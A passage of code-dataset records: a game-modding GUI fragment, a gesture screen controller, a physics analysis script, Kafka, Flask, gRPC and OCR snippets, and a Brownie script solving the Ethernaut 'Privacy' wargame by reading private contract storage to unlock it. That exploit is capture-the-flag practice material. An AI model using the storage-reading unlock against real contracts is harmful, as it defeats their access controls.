\"soulstruct-backup\"\n if not backup_path.is_dir():\n self.CustomDialog(\n \"No Backup Created\", \"Backup folder `soulstruct-backup` has not yet been created in game directory.\"\n )\n return\n if (\n self.CustomDialog(\n title=\"Confirm Backup Restore\",\n message=\"Are you sure you want to restore backup Dark Souls files?\",\n button_names=(\"Yes, continue\", \"No, go back\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n == 1\n ):\n return\n try:\n self.project.restore_game_backup(backup_path)\n except Exception as e:\n self.CustomDialog(\n \"Backup Error\",\n f\"Error while restoring game file backup:\\n\\n\"\n f\"{e}\\n\\n\"\n f\"Backup files may have been only partially restored.\",\n )\n _LOGGER.error(f\"Error while restoring game file backup: {e}\", exc_info=True)\n else:\n self.CustomDialog(\"Backup Restore Successful\", \"All backup files restored successfully.\")\n\n def _choose_directory(self, initial_dir=None, **kwargs):\n if initial_dir is None:\n initial_dir = str(self.project.project_root)\n directory = self.FileDialog.askdirectory(initialdir=initial_dir, **kwargs)\n if not directory:\n return None\n return Path(directory)\n\n def _update_banner(self, event):\n try:\n data_name = event.widget.DATA_NAME\n except AttributeError:\n raise AttributeError(f\"No `DATA_NAME` for widget: {type(event.widget)}\")\n if data_name is None:\n self.save_tab_button.var.set(f\"Save\")\n self.export_tab_button.var.set(f\"Export\")\n self.save_tab_button[\"state\"] = \"disabled\"\n self.export_tab_button[\"state\"] = \"disabled\"\n else:\n self.save_all_button[\"state\"] = \"normal\"\n self.save_tab_button[\"state\"] = \"normal\"\n self.export_all_button[\"state\"] = \"normal\"\n self.export_tab_button[\"state\"] = \"normal\"\n if data_name == \"Events\":\n self.save_tab_button.var.set(f\"Save Event Script\")\n self.export_tab_button.var.set(f\"Export Event Script\")\n elif data_name == \"AI\":\n self.save_tab_button.var.set(f\"Save All AI\")\n self.export_tab_button.var.set(f\"Export All AI\")\n elif data_name == \"Talk\":\n self.save_tab_button.var.set(f\"Save Talk Script\")\n self.export_tab_button.var.set(f\"Export All Talk in Map\")\n else:\n self.save_tab_button.var.set(f\"Save {data_name}\")\n self.export_tab_button.var.set(f\"Export {data_name}\")\n\n def _thread_with_loading_dialog(self, dialog_title: str, dialog_message: str, func: tp.Callable, *args, **kwargs):\n \"\"\"Run `func(*args, **kwargs)` in another thread while displaying an animated loading dialog in the main thread.\n\n Returns or raises anything returned or raised by the threaded function.\n \"\"\"\n\n output = Queue()\n errors = Queue()\n\n def _threaded_func():\n try:\n result = func(*args, **kwargs)\n except Exception as thread_ex:\n errors.put(thread_ex)\n else:\n output.put(result)\n\n loading_dialog = self.LoadingDialog(title=dialog_title, message=dialog_message, maximum=20)\n import_thread = threading.Thread(target=_threaded_func)\n import_thread.start()\n loading_dialog.update()\n loading_dialog.progress.start()\n while import_thread.is_alive():\n loading_dialog.update()\n time.sleep(1 / 60)\n loading_dialog.progress.stop()\n loading_dialog.destroy()\n\n if not errors.empty():\n raise errors.get()\n return output.get()\n\n @property\n def data_types(self) -> tuple[str]:\n return tuple(self.PROJECT_CLASS.DATA_TYPES)\n\n @property\n def ordered_tabs(self) -> list[str]:\n editor_tabs = [\n tab_name for tab_name in TAB_EDITORS\n if tab_name in self.PROJECT_CLASS.DATA_TYPES\n or (tab_name == \"entities\" and \"maps\" in self.PROJECT_CLASS.DATA_TYPES)\n ]\n if self.RUNTIME_MANAGER_CLASS:\n return editor_tabs + [\"runtime\"]\n return editor_tabs\n\n\ndef data_type_caps(data_type: str):\n return \"AI\" if data_type.lower() == \"ai\" else data_type.capitalize()\n","repo_name":"Grimrukh/soulstruct","sub_path":"soulstruct/base/project/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":41206,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"37"} +{"seq_id":"41672784105","text":"# -*- coding: utf-8 -*-\n\nimport copy\nimport os\nimport queue\nimport threading\nimport traceback\nimport logging\n\nimport cv2 as cv\nimport mediapipe as mp\nimport numpy as np\nimport pyautogui\n\nimport src.command_executor as com_exe\nfrom external.Kazuhito00.app_screen_control import calc_landmark_list, pre_process_landmark\nfrom external.Kazuhito00.model import KeyPointClassifier\n\nVIDEO_DEVICE_ID = 0\n(VIDEO_WIDTH, VIDEO_HEIGHT) = pyautogui.size() # This gives the size of the main screen. N.B., the returned size\n # might be smaller than the actual size if the user zooms in the screen\n # size in the Windows settings\nVIDEO_WIDTH = int(VIDEO_WIDTH / 3) # Reduce the size of the video that is shown on the display\nVIDEO_HEIGHT = int(VIDEO_HEIGHT / 3)\n\nHAND_GESTURE_MODEL_PATH = './external/Kazuhito00/model/keypoint_classifier/keypoint_classifier_screen_control.tflite'\n\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_drawing = mp.solutions.drawing_utils\nhand_draw_q = queue.Queue()\n\n\ndef draw_hand_results(results, image, hand_dict: dict) -> bool: # pragma: no cover\n \"\"\"\n Draw the hand results computed by mediapipe, and return a False flag if the user pressed ESC to quite the program.\n The hand drawing is based on midiapipe's sample code, which can be found in the \"external\" dir.\n \"\"\"\n image.flags.writeable = True\n image = cv.cvtColor(image, cv.COLOR_RGB2BGR)\n left_hand_id = None\n right_hand_id = None\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(image, hand_landmarks, mp.solutions.hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n left_hand_id = hand_dict.get('left').get('id')\n right_hand_id = hand_dict.get('right').get('id')\n cv.putText(image, 'Left hand ID: ' + str(left_hand_id), (10, 30),\n cv.FONT_HERSHEY_SIMPLEX, 1.0, (255, 0, 0), 2, cv.LINE_AA)\n cv.putText(image, 'Right hand ID: ' + str(right_hand_id), (10, 60),\n cv.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv.LINE_AA)\n cv.imshow('MediaPipe Hands', image)\n is_continue = True\n if cv.waitKey(5) & 0xFF == 27:\n is_continue = False\n return is_continue\n\n\nclass HandGestureController:\n \"\"\"\n Load opencv to capture hands from webcam, use mediapipe to get the hand key points, and use the trained customized\n model to identify the hand id, and finally call command_executor.execute_command_based_on_hand_signs.\n To reduce the latency, the plotting is executed in a separate thread.\n \"\"\"\n\n def __init__(self, video_device_id=VIDEO_DEVICE_ID, video_width=VIDEO_WIDTH, video_height=VIDEO_HEIGHT):\n self._videoCap = cv.VideoCapture(video_device_id)\n self._videoCap.set(cv.CAP_PROP_FRAME_WIDTH, video_width)\n self._videoCap.set(cv.CAP_PROP_FRAME_HEIGHT, video_height)\n self._hand_sign_classifier = None\n self._command_executor_instance = None\n self._continue_main_thread = True\n\n def start_hand_gesture_recognition(self, show_hands=False, show_faces=False):\n self._check_if_all_models_ready()\n if show_hands:\n self._start_hand_drawing_threading()\n mp_hands = mp.solutions.hands\n with mp_hands.Hands(model_complexity=0, min_detection_confidence=0.5, min_tracking_confidence=0.5,\n max_num_hands=2) as hands:\n while self._videoCap.isOpened():\n if self._continue_main_thread is False: break\n hand_dict = None\n try:\n mediapipe_hand_results, image = self._get_mediapipe_hand_results(hands)\n if mediapipe_hand_results.multi_hand_landmarks is not None:\n hand_dict \\\n = self._get_dict_of_left_right_hands_sign_ids_and_landmarks(mediapipe_hand_results, image)\n if show_hands:\n self._put_hands_to_hand_draw_q(show_faces, mediapipe_hand_results, image, hand_dict)\n if hand_dict is not None:\n self._command_executor_instance. \\\n execute_command_based_on_hand_signs(left_hand_sign_id=hand_dict.get('left').get('id'),\n left_hand_landmark=hand_dict.get('left').get(\n 'landmark'),\n right_hand_sign_id=hand_dict.get('right').get('id'),\n right_hand_landmark=hand_dict.get('right').get(\n 'landmark'))\n\n except (KeyboardInterrupt, Exception):\n traceback.print_exc()\n break\n\n self._videoCap.release()\n cv.destroyAllWindows()\n logging.info('Process finished successfully!')\n\n def load_kazuhito00_hand_sign_classifier(self, model_path: str = HAND_GESTURE_MODEL_PATH):\n if not os.path.exists(model_path):\n raise Exception(model_path + ' does not exists!')\n self._hand_sign_classifier = KeyPointClassifier(model_path=model_path)\n\n def set_command_executor(self, command_executor: com_exe.CommandExecutor):\n self._command_executor_instance = command_executor\n\n def _check_if_all_models_ready(self):\n if self._hand_sign_classifier is None:\n raise Exception('Hand_sign_classifier not assigned!')\n if self._command_executor_instance is None:\n raise Exception('Command_executor_instance not assigned!')\n\n def _get_mediapipe_hand_results(self, hands): # pragma: no cover\n success, image = self._videoCap.read()\n if not success:\n raise Exception('Image read error!')\n image = cv.flip(image, 1)\n image = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n image.flags.writeable = False # To improve performance\n return hands.process(image), image\n\n def _get_dict_of_left_right_hands_sign_ids_and_landmarks(self, mediapipe_hand_results, image) -> dict:\n \"\"\"\n\n :param mediapipe_hand_results:\n :param image:\n :return:\n \"\"\"\n hands_sign_ids_and_landmarks_dict = {'left': {\n 'id': None,\n 'landmark': None\n }, 'right': {\n 'id': None,\n 'landmark': None\n }}\n for hand_landmarks, handedness in zip(mediapipe_hand_results.multi_hand_landmarks,\n mediapipe_hand_results.multi_handedness):\n landmark_list = calc_landmark_list(image, hand_landmarks)\n pre_processed_landmark_list = pre_process_landmark(landmark_list)\n hand_sign_id = self._hand_sign_classifier(pre_processed_landmark_list)\n left_or_right_str = handedness.classification[0].label[0:].lower()\n hands_sign_ids_and_landmarks_dict[left_or_right_str] = {'id': hand_sign_id,\n 'landmark': hand_landmarks.landmark}\n return hands_sign_ids_and_landmarks_dict\n\n def _start_hand_drawing_threading(self):\n \"\"\"\n Draw the hands in a separate thread.\n \"\"\"\n threading.Thread(target=self._hand_drawing_threading_func, daemon=True).start()\n\n def _hand_drawing_threading_func(self):\n \"\"\"\n This is the target function of threading.Thread\n It will get the required arguments from the threading queue hand_draw_q, and pass the arguments to\n draw_hand_results.\n It will stop the main thread if draw_hand_results() returns False\n \"\"\"\n while True:\n args = hand_draw_q.get()\n if not draw_hand_results(*args):\n self._continue_main_thread = False\n break\n\n @staticmethod\n def _put_hands_to_hand_draw_q(show_faces, mediapipe_hand_results, image, hand_dict):\n if show_faces:\n image_to_plot = copy.deepcopy(image)\n else:\n image_to_plot = np.zeros((VIDEO_HEIGHT, VIDEO_WIDTH, 3), np.uint8)\n args = (mediapipe_hand_results, image_to_plot, hand_dict)\n hand_draw_q.put_nowait(args)\n","repo_name":"wengchenyang1/Offline-Screen-Control-Sharing","sub_path":"src/hand_gesture_controller.py","file_name":"hand_gesture_controller.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72299787626","text":"'''\npython script to study the origin of the clusters in MC\nrun: python ClusterOriginStudy.py\n'''\nfrom ROOT import TFile, TH1F, TH2F, TCanvas, TMath, TLegend, kRainBow, kBlack, kRed, kPink, kAzure, kOrange, kSpring, kOpenCircle, kFullCross, kFullSquare, TLatex, kMagenta, kCyan # pylint: disable=import-error,no-name-in-module\nimport sys\nimport numpy as np\nimport pandas as pd\nimport uproot\nfrom alive_progress import alive_bar\nimport matplotlib.pyplot as plt\nsys.path.append('..')\nfrom utils.AnalysisUtils import ComputeRatioDiffBins, MCProcess\n\nmarkers = [kOpenCircle, kFullSquare]\n\ndef main():\n #----------------------------------------------------------------\n data = '/home/spolitan/Analyses/ITS_Cluster_Studies/macros/outFileMCid_thr0_1207_MCtree_morning.root'\n outlabel = 'globalMC_wcut_1207'\n query = ''\n outFile = TFile(f'MCOriginStudy{outlabel}.root', 'recreate')\n Vars = [] # if left empty consider all the vars\n enabledProcesses = ['d-rays', 'Primary', 'HInhelastic', 'Hadronic', 'PositronNuclear', 'ElectronNuclear', 'Pair']\n doLayerStudy = True # if true, study L0 and L6 clusters\n doLayerFracStudy = False # if true, study the fraction of d-rays on each layer and close \n #----------------------------------------------------------------\n\n # read data\n df = uproot.open(data)['MCtree'].arrays(library='pd')\n df_sel = df\n df_sel['E_mev'] = df_sel['E'] * 1000\n \n if query != '':\n print(f'\\033[1m\\033[93mApplying query: {query}\\033[0m')\n df_sel = df_sel.query(query, inplace=False)\n\n df_sel_proc = []\n labels = []\n colors = [kAzure+4, kRed+1, kSpring+3, kOrange+1, kPink+1, kCyan+1, kMagenta+1]\n\n print(f'\\033[1mEnabled processes: {enabledProcesses}\\033[0m')\n for i, idProcess in enumerate(df_sel['ProcessID'].unique()):\n label = MCProcess(idProcess)\n if label not in enabledProcesses:\n continue\n labels.append(label)\n df_sel_proc.append(df_sel.query(f'ProcessID == {idProcess}'))\n\n # delta rays energy distribution\n subdir = outFile.mkdir('EkinStudy')\n outFile.cd('EkinStudy')\n if 'd-rays' in enabledProcesses:\n df_kin_study = df_sel_proc[labels.index('d-rays')]\n print(f'\\033[1mEkin study for d-rays: \\033[0m')\n hEkin = TH1F('hEkin', 'hEkin;E_{tot} [MeV]; Events', 1000, 0, 1)\n hEtotal = TH1F('hEtotal', 'hEtotal;E_{kin} [MeV];Events', 1000, 0, 1)\n hEkin_Clsize_corr = [TH2F(f'hEkin_Clsize_corr_L{i}',\n f'hEkin_Clsize_corr_L{i};E_{{kin}} [MeV];Cluster size',\n 1000, 0, 1, 100, 0, 100) for i in range(7)]\n\n for i, (E_mev, clsize, layer) in enumerate(zip(df_kin_study['E_mev'],\n df_kin_study['CLsize'],\n df_kin_study['Layer'])):\n hEtotal.Fill(E_mev)\n Ekin = E_mev - 0.511 # electron mass\n hEkin.Fill(Ekin)\n hEkin_Clsize_corr[layer].Fill(Ekin, clsize)\n hEtotal.Write()\n hEkin.Write()\n for h in hEkin_Clsize_corr:\n h.Write()\n else:\n print(f'Ekin study implemented only for d-rays. Make sure d-rays are the first process in the list of enabled processes!')\n outFile.cd()\n\n if doLayerFracStudy:\n print(f'\\033[1mLayer fraction study\\033[0m')\n subdir = outFile.mkdir('LayerFracStudy')\n if enabledProcesses == ['d-rays']:\n hLayers = TH1F('hLayers', 'hLayers', 7, -0.5, 6.5)\n hLayersOver40 = TH1F('hLayersOver40', 'hLayersOver40', 7, -0.5, 6.5)\n for i, (layer, clsize) in enumerate(zip(df_sel_proc[0]['Layer'], df_sel_proc[0]['CLsize'])):\n hLayers.Fill(layer)\n if clsize > 40:\n hLayersOver40.Fill(layer)\n #SetHistStyle(hLayers, kBlack, kOpenCircle, 'Layer', '#delta-rays per layer')\n #SetHistStyle(hLayersOver40, kRed, kOpenCircle, 'Layer', '#delta-rays > 40 per layer')\n hLayers.Write()\n hLayersOver40.Write()\n outFile.Write()\n else:\n print(f'Layer fraction study not implemented for {enabledProcesses}. Continue.')\n\n print(f'\\033[1mEnabled variables: {Vars}\\033[0m')\n if not Vars:\n Vars = df.keys()\n binning, mins, maxs = ([] for i in range(3))\n for var in Vars:\n if var == 'eta':\n binning.append(100)\n mins.append(-3.14)\n maxs.append(3.14)\n\n elif var == 'phi':\n binning.append(100)\n mins.append(0)\n maxs.append(6.28)\n\n elif var == 'X' or var == 'Y' or var == 'Z':\n binning.append(100)\n mins.append(-100)\n maxs.append(100)\n\n elif var == 'CLsize':\n binning.append(100)\n mins.append(0.)\n maxs.append(100)\n\n elif var == 'Layer':\n binning.append(7)\n mins.append(-0.5)\n maxs.append(6.5)\n\n elif var == 'p':\n binning.append(100)\n mins.append(0)\n maxs.append(1)\n\n else:\n binning.append(100)\n mins.append(0.)\n maxs.append(100)\n\n with alive_bar(len(Vars), title=\"Plotting variables\") as bar:\n for i, (var, bins, minvar, maxvar) in enumerate(zip(Vars, binning, mins, maxs)):\n print(f'\\033[1mPlotting variable: {var}\\033[0m')\n hVar = TH1F(f'h{var}', f';{var}; counts', bins, minvar, maxvar)\n\n if doLayerStudy and var == 'CLsize':\n hCL_vs_layer = TH2F('hCL_vs_layer', 'hCL_vs_layer; Layer; Cluster size', 7, -0.5, 6.5, 100, 0, 100)\n hCL = [TH1F(f'hCL{i}', f'; Cluster size; Counts', 100, 0, 100) for i in range(7)]\n\n if 'X' in Vars and 'Y' in Vars and 'Z' in Vars and var == 'X':\n hXY = TH2F(f'hXY', ';X (cm);Y (cm)', 1200, -60, 60, 1200, -60, 60)\n hXZ = TH2F(f'hXZ', ';X (cm);Z (cm)', 1200, -60, 60, 1200, -60, 60)\n hYZ = TH2F(f'hYZ', ';Y (cm);Z (cm)', 1200, -60, 60, 1200, -60, 60)\n\n hVarSel_proc, hCL_proc = [], [] # list of TH1F for each process\n hXY_proc, hXZ_proc, hYZ_proc = [], [], [] # list of TH2F for each process\n for k, label in enumerate(labels):\n hVarSel_proc.append(TH1F(f'h{var}Sel_proc{label}', f';{var}; counts', bins, minvar, maxvar))\n if 'X' in Vars and 'Y' in Vars and 'Z' in Vars and var == 'X':\n hXY_proc.append(TH2F(f'hXY_proc{label}', ';X (cm);Y (cm)', 1200, -60, 60, 1200, -60, 60))\n hXZ_proc.append(TH2F(f'hXZ_proc{label}', ';X (cm);Z (cm)', 1200, -60, 60, 1200, -60, 60))\n hYZ_proc.append(TH2F(f'hYZ_proc{label}', ';Y (cm);Z (cm)', 1200, -60, 60, 1200, -60, 60))\n if doLayerStudy and var == 'CLsize':\n hCL_proc.append([TH1F(f'hCL{i}proc{label}', f'hCL_L{i}proc{label}; Cluster size', 100, 0, 100) for i in range(7)])\n SetObjectStyle(hCL_proc[k][i], linecolor=colors[k], fillcolor=colors[k], markerstyle=20, markercolor=colors[k], markersize=0.5)\n \n # filling histograms\n for i in (df_sel[f'{var}']): # loop over all events\n hVar.Fill(i)\n\n if 'X' in Vars and 'Y' in Vars and 'Z' in Vars and var == 'X':\n for i, (x, y, z) in enumerate(zip(df_sel['X'], df_sel['Y'], df_sel['Z'])):\n hXY.Fill(x, y)\n hXZ.Fill(x, z)\n hYZ.Fill(y, z)\n for i, dfproc in enumerate(df_sel_proc):\n for j, (x, y, z) in enumerate(zip(dfproc['X'], dfproc['Y'], dfproc['Z'])):\n hXY_proc[i].Fill(x, y)\n hXZ_proc[i].Fill(x, z)\n hYZ_proc[i].Fill(y, z)\n\n if doLayerStudy and var == 'CLsize':\n for i, (clsize, layer) in enumerate(zip(df_sel[f'{var}'], df_sel['Layer'])):\n hCL[layer].Fill(clsize)\n hCL_vs_layer.Fill(layer, clsize)\n for i, dfproc in enumerate(df_sel_proc):\n for j, (clsize, layer) in enumerate(zip(dfproc[f'{var}'], dfproc['Layer'])):\n hCL_proc[i][layer].Fill(clsize)\n cClvsLayer_contrib = []\n hRatio = []\n leg = TLegend(0.5, 0.6, 0.7, 0.8)\n leg.SetBorderSize(0)\n for i in range(7):\n hRatio.append([])\n cClvsLayer_contrib.append(TCanvas(f\"cClvsLayer{i}_contrib\", \"\", 1600, 900))\n cClvsLayer_contrib[i].Divide(2, 1)\n cClvsLayer_contrib[i].cd(1).DrawFrame(0, 0, 100, 100, '; Cluster size L; Counts')\n cClvsLayer_contrib[i].cd(1).SetLogy()\n SetObjectStyle(hCL[i], linecolor=kBlack, fillcolor=kBlack, marker=kOpenCircle, fillalpha=0.2)\n hCL[i].SetStats(0)\n hCL[i].Draw('hist')\n if i == 0:\n leg.AddEntry(hCL[i], 'All', 'l')\n for j, h in enumerate(hCL_proc):\n SetObjectStyle(h[i], linecolor=colors[j], markercolor=colors[j],\n fillcolor=colors[j], marker=kOpenCircle, fillalpha=0.2)\n h[i].Draw('samehist')\n if i == 0:\n leg.AddEntry(h[i], labels[j], 'l')\n proc = labels[j]\n hRatio[i].append(h[i].Clone(f'hRatio{i}proc{proc}'))\n hRatio[i][j].Divide(hCL[i])\n SetObjectStyle(hRatio[i][j], linecolor=colors[j], markercolor=colors[j],\n fillcolor=colors[j], marker=kOpenCircle, fillalpha=0.2)\n leg.Draw('same')\n cClvsLayer_contrib[i].cd(2).SetLogy()\n cClvsLayer_contrib[i].cd(2).DrawFrame(0, 0.001, 100, 2.0, '; Cluster size; Ratio')\n for j, h in enumerate(hRatio[i]):\n h.Draw('samehist')\n \n leg_proc = TLegend(0.5, 0.6, 0.7, 0.8)\n leg_proc.SetBorderSize(0)\n leg_proc.AddEntry(hVar, 'All', 'l')\n for i, dfproc in enumerate(df_sel_proc): # loop over all processes\n for j in (dfproc[f'{var}']): # loop over all events\n hVarSel_proc[i].Fill(j)\n leg_proc.AddEntry(hVarSel_proc[i], labels[i], 'l')\n\n SetObjectStyle(hVar, markercolor=kBlack, marker=kOpenCircle, fillalpha=0.5, linewidth=2, fillcolor=kBlack)\n for i, h in enumerate(hVarSel_proc):\n SetObjectStyle(h, color=colors[i], fillcolor=colors[i], fillalpha=0.5, linewidth=2, marker=kOpenCircle, markercolor=colors[i])\n\n outFile.mkdir(f'{var}') if not outFile.Get(f'{var}') else None\n outFile.cd(f'{var}')\n c1 = TCanvas(f\"c{var}\", \"\", 1800, 1200)\n hVar.Draw('histesame')\n hVar.Write()\n for i, h in enumerate(hVarSel_proc):\n h.Draw('histesame')\n h.Write()\n leg_proc.Draw('same')\n c1.Write()\n outFile.cd('../')\n\n if 'X' in Vars and 'Y' in Vars and 'Z' in Vars and var == 'X':\n outFile.mkdir('space_correlation') if not outFile.GetDirectory('space_correlation') else None\n outFile.cd('space_correlation')\n hXY.Write()\n hXZ.Write()\n hYZ.Write()\n for i, (hXY, hXZ, hYZ) in enumerate(zip(hXY_proc, hXZ_proc, hYZ_proc)):\n hXY.Write()\n hXZ.Write()\n hYZ.Write()\n outFile.cd('../')\n\n if doLayerStudy and var == 'CLsize':\n outFile.mkdir('CL_vs_layer') if not outFile.GetDirectory('CL_vs_layer') else None\n outFile.cd('CL_vs_layer')\n hCL_vs_layer.Write()\n for i, h in enumerate(hCL):\n h.Write()\n for i, hproc in enumerate(hCL_proc):\n for j, h in enumerate(hproc):\n h.Write()\n outFile.mkdir('CL_vs_layer/contributions') if not outFile.GetDirectory('CL_vs_layer/contributions') else None\n outFile.cd('CL_vs_layer/contributions')\n for i, h in enumerate(hRatio):\n for j, h in enumerate(h):\n h.Write()\n for i in range(7):\n cClvsLayer_contrib[i].Write()\n cClvsLayer_contrib[i].SaveAs(f'cClvsLayer{i}_contrib.png')\n outFile.cd('../../')\n bar()\n\n outFile.Close()\n input('Press enter to exit')\n sys.exit()\n\nmain()\n","repo_name":"fmazzasc/ITS_Cluster_Studies","sub_path":"py/ClusterOriginStudy.py","file_name":"ClusterOriginStudy.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"33365878497","text":"from scripts.helpful_scripts import get_account\nfrom brownie import web3, interface\n\n\nETHERNAUT_INSTANCE = \"0xbf0cdE8daAdF37782fC6c250097a53900BfEEcaD\"\nGAS_LIMIT = 6000000\n\n\ndef main():\n\n player = get_account()\n target = interface.IPrivacy(ETHERNAUT_INSTANCE)\n\n # store_4 = web3.eth.get_storage_at(ETHERNAUT_INSTANCE, 4)\n # print(f\"store 4 = {store_4}\")\n\n store_5 = web3.eth.get_storage_at(ETHERNAUT_INSTANCE, 5)\n print(f\"store 5 = {store_5}\")\n\n # assign the key data\n data = store_5\n\n # key = bytes(data[:16])\n key = data[:16]\n # print(key)\n\n print(f\"\\nLocked status: {target.locked()}\\n\")\n target.unlock(key, {\"from\": player, \"gas_limit\": GAS_LIMIT, \"allow_revert\": True})\n print(f\"\\nLocked status: {target.locked()}\\n\")\n","repo_name":"sarobinson2011/ethernaut-brownie","sub_path":"scripts/12-deploy_attack.py","file_name":"12-deploy_attack.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74696383468","text":"# Import des modules nécessaires\nfrom kafka import KafkaConsumer\nimport json\n\n\n# Définir les informations de connexion Kafka\nKAFKA_TOPIC = 'velib_data'\n\n\n# Créer un consumer Kafka\nconsumer = KafkaConsumer(KAFKA_TOPIC, bootstrap_servers='localhost:9092')\n\n\n# bouclez pour consommer les messages du topic Kafkaa\nfor msg in consumer:\n # Récupérer les données du message\n \n # récupérez le message en tant que dictionnaire\n station = msg.value.decode()\n print(station)\n\n\n","repo_name":"keagnon/Project-kafka-Spark-DB-ML","sub_path":"Récupération_des_données/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6739655937","text":"\n\nfrom Generic.patterns.observer import Observer, Subject\nfrom Generic.decoration import alias\n\n\nclass Channels(Subject):\n\n @alias(Subject, 'attach')\n def subscribe(self, client):\n print(client)\n self._observers.append(client)\n\n\nclass Client(Observer):\n\n @alias(Observer, 'update')\n def receive(self, channel: Channels):\n print(channel, 1)\n\nclass Client2(Observer):\n\n def update(self, subject):\n print('sss')\n\n\nchannel = Channels()\nclient = Client()\nclient2 = Client2()\nchannel.attach(client)\nchannel.attach(client2)\nchannel.notify()\n\n","repo_name":"hc-tec/pydis","sub_path":"testcase/Generic/patterns/observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12651208013","text":"from guizero import App, Text, TextBox, PushButton\n\n\ndef calc():\n try:\n if tbxNumber.get() != \"\":\n number = int(tbxNumber.get())\n output = number * 2\n txtOutput.set(str(number) + \" doubled is \" + str(output))\n tbxNumber.set(\"\")\n else:\n txtOutput.set(\"Error: No number entered\")\n except ValueError:\n txtOutput.set(\"Error: Invalid number entered\")\n\n\nwindow1 = App(\"Doubler\",\n height=180, width=340,\n layout=\"grid\")\n\nText(window1, \" \", grid=[0, 0]) # Spacer\n\nText(window1, \" Enter a number \", grid=[1, 1])\n\ntbxNumber = TextBox(window1, grid=[1, 2], align=\"left\")\n\nText(window1, grid=[2, 0]) # Spacer\n\nPushButton(window1, text=\"Click to Double\",\n command=calc, grid=[3, 1])\n\ntxtOutput = Text(window1, grid=[3, 2])\n\nText(window1, grid=[4, 0]) # Spacer\n\nPushButton(window1, text=\" Exit \",\n command=quit, grid=[5, 1])\n\nwindow1.display()\n","repo_name":"emailman/Raspberry_Pi_Heater","sub_path":"forms/alert1.py","file_name":"alert1.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74851073387","text":"import sys\r\ntry:\r\n x=int(input(\"Enter a number : \"))\r\n y=int(input(\"Enter another number :\"))\r\nexcept ValueError:\r\n print(\"Number cannot be a Letter\")\r\n sys.exit(1)\r\n\r\ntry: \r\n result = x/y\r\nexcept ZeroDivisionError:\r\n print(\"Error : Cannot divide by zero\")\r\n sys.exit(1)\r\n\r\nprint(f\"{x}/{y}={result}\")\r\n","repo_name":"SiddharthJadhav99/Python_Basics","sub_path":"exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18468790378","text":"import cv2\r\nfrom PIL import Image\r\nimport pytesseract\r\nimport time\r\n\r\ncap = cv2.VideoCapture(0) # 0: default camera\r\n\r\nwhile cap.isOpened():\r\n # 카메라 프레임 읽기\r\n success, frame = cap.read()\r\n if success:\r\n # 프레임 출력\r\n cv2.imshow('Camera Window', frame)\r\n\r\n # ESC를 누르면 캡처\r\n key = cv2.waitKey(1) & 0xFF\r\n if (key == 27):\r\n return_value, image = cap.read()\r\n cv2.imwrite(\"opencv.jpg\", image)\r\n time.sleep(1)\r\n\r\n pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'\r\n text = pytesseract.image_to_string(Image.open(\"opencv.jpg\"), lang=\"kor\")\r\n\r\n print(text.replace(\" \", \"\"))\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"CreamMeatball/OpenSourceSoftware","sub_path":"팀프로젝트/opencvtext_cam.py","file_name":"opencvtext_cam.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29969508866","text":"import pandas as pd\nfrom flask import Flask, jsonify\n\napp = Flask(__name__)\n\n\n# Construir as funcionalidades\n@app.route(\"/\")\ndef homepage():\n return \"API está no ar!!!\"\n\n\n# Pegas as vendas\n@app.route(\"/pegarvendas\")\ndef pegarvendas():\n tabela = pd.read_csv(\"pegarvendas.csv\")\n total_vendas = tabela[\"Vendas\"].sum()\n resposta = {'total_vendas': total_vendas}\n return jsonify(resposta)\n\n\n# rodar o servidor da API\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"DeividBertapele/Flask_FastAPI_Python","sub_path":"API_Python_Pandas/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25757606237","text":"import grpc\nfrom concurrent import futures\nimport math_pb2_grpc\nimport math_pb2\n\nclass Calc(math_pb2_grpc.CalcServicer):\n def Mult(self, request, context):\n # request is a MultRequest obj\n print(request)\n result = request.x * request.y\n return math_pb2.MultResp(result=result)\n\nserver = grpc.server(futures.ThreadPoolExecutor(max_workers=10), options=[(\"grpc.so_reuseport\", 0)])\n\nmath_pb2_grpc.add_CalcServicer_to_server(Calc(), server)\nprint(\"start listening on port 5444\")\nserver.add_insecure_port('localhost:5444')\nserver.start()\nserver.wait_for_termination()\n","repo_name":"cs544-wisc/s23","sub_path":"lec/10-rpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"32673171375","text":"import 